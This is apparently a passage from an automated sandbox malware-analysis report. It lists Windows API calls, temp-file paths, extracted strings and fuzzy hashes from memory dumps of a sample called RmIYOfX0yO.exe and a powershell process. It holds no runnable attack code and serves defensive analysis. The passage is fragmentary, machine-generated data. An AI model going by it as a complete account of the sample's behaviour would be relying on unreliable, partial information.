                                                                                                                    • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004033A3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 00405B3D
                                                                                                                    • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004033A3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 00405B47
                                                                                                                    • lstrcatW.KERNEL32(?,0040A014), ref: 00405B59
                                                                                                                    Strings
                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B37
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CharPrevlstrcatlstrlen
                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                    • API String ID: 2659869361-1881609536
                                                                                                                    • Opcode ID: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
                                                                                                                    • Instruction ID: 377234fc647d40db67a969affeec1c2d2c00c7240f2da489af686c3f2ce23dc9
                                                                                                                    • Opcode Fuzzy Hash: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
                                                                                                                    • Instruction Fuzzy Hash: E1D05E711019246AC1117B448D04DDB63ACAE45300341046EF202B70A6C778695286FD
                                                                                                                    APIs
                                                                                                                    • CloseHandle.KERNEL32(000002B0,C:\Users\user\AppData\Local\Temp\,0040370C,?), ref: 004038EC
                                                                                                                    • CloseHandle.KERNEL32(000002A8,C:\Users\user\AppData\Local\Temp\,0040370C,?), ref: 00403900
                                                                                                                    Strings
                                                                                                                    • C:\Users\user\AppData\Local\Temp\nsp7359.tmp, xrefs: 00403910
                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 004038DF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseHandle
                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsp7359.tmp
                                                                                                                    • API String ID: 2962429428-2659438096
                                                                                                                    • Opcode ID: 818760232e500ac014ecc4659e20c47a416318d98e4cd696d1546b419abd0e17
                                                                                                                    • Instruction ID: de49926bb72e77a98f9c5ce19ed8b4a608a10c25b77e0dec4f49a46a5066bf07
                                                                                                                    • Opcode Fuzzy Hash: 818760232e500ac014ecc4659e20c47a416318d98e4cd696d1546b419abd0e17
                                                                                                                    • Instruction Fuzzy Hash: E2E086B140071896C5246F7CAD4D9953A185F453357244326F078F60F0C7789A675A99
                                                                                                                    APIs
                                                                                                                    • IsWindowVisible.USER32(?), ref: 00405285
                                                                                                                    • CallWindowProcW.USER32(?,?,?,?), ref: 004052D6
                                                                                                                      • Part of subcall function 00404293: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004042A5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3748168415-3916222277
                                                                                                                    • Opcode ID: 56cab98530d4ff4408cd9c369303e271687e5fa7c90705031ed2c8dc290fa65f
                                                                                                                    • Instruction ID: e2cad66c9b02384d3be1b0302d87088ec840166322e374313d6fbb5223fafa3d
                                                                                                                    • Opcode Fuzzy Hash: 56cab98530d4ff4408cd9c369303e271687e5fa7c90705031ed2c8dc290fa65f
                                                                                                                    • Instruction Fuzzy Hash: 5D01B1B1210709AFEF208F51DD80A6B3B35EF85361F10813BFA00761D1C77A9C529E29
                                                                                                                    APIs
                                                                                                                    • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402EAD,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\RmIYOfX0yO.exe,C:\Users\user\Desktop\RmIYOfX0yO.exe,80000000,00000003), ref: 00405B89
                                                                                                                    • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402EAD,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\RmIYOfX0yO.exe,C:\Users\user\Desktop\RmIYOfX0yO.exe,80000000,00000003), ref: 00405B99
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CharPrevlstrlen
                                                                                                                    • String ID: C:\Users\user\Desktop
                                                                                                                    • API String ID: 2709904686-4267323751
                                                                                                                    • Opcode ID: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
                                                                                                                    • Instruction ID: 9a844447357a9703a2937c3aa74ac44ffd17116a21dd7a3b54c6405c44ad0d39
                                                                                                                    • Opcode Fuzzy Hash: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
                                                                                                                    • Instruction Fuzzy Hash: 86D05EB2401D209AD3226B08DC01D9F73ACEF1130174A486AE441A61A5D7787D808AA8
                                                                                                                    APIs
                                                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F9E,00000000,[Rename],00000000,00000000,00000000), ref: 00405CCD
                                                                                                                    • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405CE5
                                                                                                                    • CharNextA.USER32(00000000,?,00000000,00405F9E,00000000,[Rename],00000000,00000000,00000000), ref: 00405CF6
                                                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00405F9E,00000000,[Rename],00000000,00000000,00000000), ref: 00405CFF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 190613189-0
                                                                                                                    • Opcode ID: b8842b5e9385eef73c106f2d1b4b6860648d7e9ee05fc0ebd9cde526d115cc76
                                                                                                                    • Instruction ID: b93a28ad29d67f10a2270253d02d4651c85e208682c2a56c3792b5f99d5f0f7a
                                                                                                                    • Opcode Fuzzy Hash: b8842b5e9385eef73c106f2d1b4b6860648d7e9ee05fc0ebd9cde526d115cc76
                                                                                                                    • Instruction Fuzzy Hash: 6FF0F631104958BFC7129FA5DD00A9FBBA8EF05350B2580BAE841F7220D674DE01AF68
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2185194466.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: (f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$4'lq$4'lq$4'lq$4'lq$4'lq$4yl$4yl$tLnk$tLnk$tLnk$tLnk$tLnk$tLnk$x.mk$x.mk$x.mk$-mk$-mk
                                                                                                                    • API String ID: 0-4077585473
                                                                                                                    • Opcode ID: bb2b636c670dc8efd49d2e4480942d6666686329b5b932a2a5c95521b4bf3d90
                                                                                                                    • Instruction ID: e586be4bda5ef6f495f0bd4e49b3e9fa6a58ea5524d35356c2b4a97fc97c5703
                                                                                                                    • Opcode Fuzzy Hash: bb2b636c670dc8efd49d2e4480942d6666686329b5b932a2a5c95521b4bf3d90
                                                                                                                    • Instruction Fuzzy Hash: E80361F4B00215DFDB24DF68C951BAAB7B2AF95304F1084A9D909AB785CB31ED81CF52
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2176997039.000000000087D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0087D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_87d000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: eabf83def32958cc2c05de90ddd6f0590389bb03b00838c655e8484874fef26f
                                                                                                                    • Instruction ID: d398ec948221348d25e77e2180b718798d22c3a29d0801c6198f881fe6fb1259
                                                                                                                    • Opcode Fuzzy Hash: eabf83def32958cc2c05de90ddd6f0590389bb03b00838c655e8484874fef26f
                                                                                                                    • Instruction Fuzzy Hash: DA21E075504204DFCF05CF14D9C0B26BFA5FB88318F24C5A9EA0D8A25AC336D856CB61
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2185194466.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: (f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$4'lq$4'lq$4'lq$tLnk$tLnk$tLnk$tLnk$x.mk$x.mk$-mk$-mk
                                                                                                                    • API String ID: 0-2443095176
                                                                                                                    • Opcode ID: 3fcc7c3165f839ce3ca7de880a840f2630bc5ec084680309ccb24a64e57c22fc
                                                                                                                    • Instruction ID: ec34d9643b2ec68492e687c2bbed5fd17761b7cfca442ab5c157e973add0ab54
                                                                                                                    • Opcode Fuzzy Hash: 3fcc7c3165f839ce3ca7de880a840f2630bc5ec084680309ccb24a64e57c22fc
                                                                                                                    • Instruction Fuzzy Hash: BAC272F4B002159FDB24DF68C950BAAB7B3AF95304F1085A9D9096B781CB35ED81CF92
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2185194466.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: (f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$4'lq$4'lq$4'lq$4'lq$4'lq$4'lq$tLnk$tPlq$tPlq$x.mk$-mk
                                                                                                                    • API String ID: 0-2553782639
                                                                                                                    • Opcode ID: a31c8232f817acfc20e9ee79b357582fed9e625156ee16be60a2eca1890d453f
                                                                                                                    • Instruction ID: 9561d9a281ec9bf8808edde5ba1a2369880aa2adb1c09bf6c75405397d785501
                                                                                                                    • Opcode Fuzzy Hash: a31c8232f817acfc20e9ee79b357582fed9e625156ee16be60a2eca1890d453f
                                                                                                                    • Instruction Fuzzy Hash: 13A2B4B4B00215DFC724DFA8C951B6AB7B2AB94304F10C5ADD50AAB785CB71ED81CF92
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2185194466.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: (f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$4'lq$tLnk$tLnk$x.mk$-mk
                                                                                                                    • API String ID: 0-847426991
                                                                                                                    • Opcode ID: 105a38e5bb61d068931448896cd591c3a9b13d84b170e3cf93718e7b598346ef
                                                                                                                    • Instruction ID: 5b9640e30f27cdfe24ac0dc4d162316dcfe774952d72435f57eda88ebbf41d22
                                                                                                                    • Opcode Fuzzy Hash: 105a38e5bb61d068931448896cd591c3a9b13d84b170e3cf93718e7b598346ef
                                                                                                                    • Instruction Fuzzy Hash: 838283B4B00215DFD724DFA4C951BAAB7B3AB94304F10C5ADD90A6B781CB71AD81CF92
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2191546104.0000000008F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_8f20000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: (f|l$(f|l$4'lq$4'lq$4'lq$4'lq$tPlq$tPlq$$lq$$lq$$lq$$lq$$lq$$lq$$lq$$lq$$lq
                                                                                                                    • API String ID: 0-3744569988
                                                                                                                    • Opcode ID: 8a395f82c50cf960fc73b1e69ad636c452de9ab98c110815a122017a91bcd16b
                                                                                                                    • Instruction ID: aad93dc4dd68ad1fa5aeca3edd279f39964007a3cf99a57d9a2692d4fd0903a1
                                                                                                                    • Opcode Fuzzy Hash: 8a395f82c50cf960fc73b1e69ad636c452de9ab98c110815a122017a91bcd16b
                                                                                                                    • Instruction Fuzzy Hash: 0732D375B00215DFDB14CF78C540AAABBB2EF85311F2880AED8059B355DB31ED85CBA5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2185194466.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: (f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$4'lq$tLnk$x.mk$-mk
                                                                                                                    • API String ID: 0-683407794
                                                                                                                    • Opcode ID: c34045534f8ff27c7e899e72a94268864fd4b7df9c2ac863fcb4ff7be92e3693
                                                                                                                    • Instruction ID: 200323639cda1698050f3bb837f69fb054cbc35a1e44b6a043da4f8e4c345169
                                                                                                                    • Opcode Fuzzy Hash: c34045534f8ff27c7e899e72a94268864fd4b7df9c2ac863fcb4ff7be92e3693
                                                                                                                    • Instruction Fuzzy Hash: 04526FB4A00215DFD724DF98C951BAAB7B3EB94304F10C5ADD90A6B781CB71AD81CF92
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2185194466.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: (f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$4'lq$tLnk$x.mk$-mk
                                                                                                                    • API String ID: 0-683407794
                                                                                                                    • Opcode ID: 6a6d99c1e3e711fd47f668dee806863a2deaa615300cc264eac9dd53e2b32446
                                                                                                                    • Instruction ID: e84da66040a9ffe13caf095dc0bdb6bf6b7bf36935a332273a12c8a708c5fb1f
                                                                                                                    • Opcode Fuzzy Hash: 6a6d99c1e3e711fd47f668dee806863a2deaa615300cc264eac9dd53e2b32446
                                                                                                                    • Instruction Fuzzy Hash: F942A4F4B002159FDB24DB68CD90BAAB7B3AF94304F1085A9D51A6B781DB31ED81CF52
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2185194466.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: (f|l$(f|l$(f|l$(f|l$(f|l$4'lq$4yl$tLnk$x.mk
                                                                                                                    • API String ID: 0-3151839352
                                                                                                                    • Opcode ID: d1a1d4d021adaa65ea5988146d1bffc83f0353f271048fe1baf879afd4468a80
                                                                                                                    • Instruction ID: 23e78cecea9bb99e66bb7a26a4d0a5dc66a8229cd5fd25d2584c508b1176c613
                                                                                                                    • Opcode Fuzzy Hash: d1a1d4d021adaa65ea5988146d1bffc83f0353f271048fe1baf879afd4468a80
                                                                                                                    • Instruction Fuzzy Hash: 38125DF4B00216DFDB25CB64C941BA9B7B2AB55304F1184EDD54AAB781CB31EE81CF52
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2185194466.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: (f|l$(f|l$(f|l$(f|l$(f|l$4'lq$4yl$tLnk$x.mk
                                                                                                                    • API String ID: 0-3151839352
                                                                                                                    • Opcode ID: 5b4c6d12b10efd6b3429222560b625f8dc31605ee1693ade88b7e1fddf567757
                                                                                                                    • Instruction ID: 8deb3f54956982a2654198a7219caf2355aaff07a1c3ade797b6c603b35dcd2f
                                                                                                                    • Opcode Fuzzy Hash: 5b4c6d12b10efd6b3429222560b625f8dc31605ee1693ade88b7e1fddf567757
                                                                                                                    • Instruction Fuzzy Hash: 2F125BF4B00216DFDB25CBA4C941BA9B7B2AB55304F1184EDD44AAB781CB71EE81CF52
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2185194466.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: (f|l$(f|l$4'lq$4'lq$4'lq$4'lq$x.mk$-mk
                                                                                                                    • API String ID: 0-1251664660
                                                                                                                    • Opcode ID: 1e0ab45aa19b529aae5b884fe237e34f1681e3a3c00602383d9f5b5de36dc858
                                                                                                                    • Instruction ID: f03840b588d005d27ad5ed8fad265779d8d441789fa268a899b167dd7621ba32
                                                                                                                    • Opcode Fuzzy Hash: 1e0ab45aa19b529aae5b884fe237e34f1681e3a3c00602383d9f5b5de36dc858
                                                                                                                    • Instruction Fuzzy Hash: 4CE192B4B002069FC714DFA8C591BAEBBB3AF94308F25C169D5056F399CB71EC458B92
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2185194466.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: (f|l$4'lq$4'lq$x.mk$-mk
                                                                                                                    • API String ID: 0-1567502811
                                                                                                                    • Opcode ID: f1c6bb958a78131cb258054d3689623908a773225ceff26809a4ff96307f8111
                                                                                                                    • Instruction ID: 4a3020122edd628b64330c13307e44ae2478525a524d1613634d1963e11a2f00
                                                                                                                    • Opcode Fuzzy Hash: f1c6bb958a78131cb258054d3689623908a773225ceff26809a4ff96307f8111
                                                                                                                    • Instruction Fuzzy Hash: F4C1B0B4B00205DFC715DFA8C581BAEBBB2AF98308F15C159E5056F395CB71EC468B92
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2185194466.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4'lq$4'lq$$lq$$lq$$lq
                                                                                                                    • API String ID: 0-2560084307
                                                                                                                    • Opcode ID: 852e2947fddb361d8500135f15624275681f9f6fc7518fb4693eae07953f6b5e
                                                                                                                    • Instruction ID: d20f4e0d5a95c913deaf51db0d8b36aaffd951fa62c8a4e51040caca1e29cb11
                                                                                                                    • Opcode Fuzzy Hash: 852e2947fddb361d8500135f15624275681f9f6fc7518fb4693eae07953f6b5e
                                                                                                                    • Instruction Fuzzy Hash: 738146B1B002069FCB15DFA989012ABBBB2EFA5710B14C46ED825DB2C4DB31D941C7E3
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2191546104.0000000008F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_8f20000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
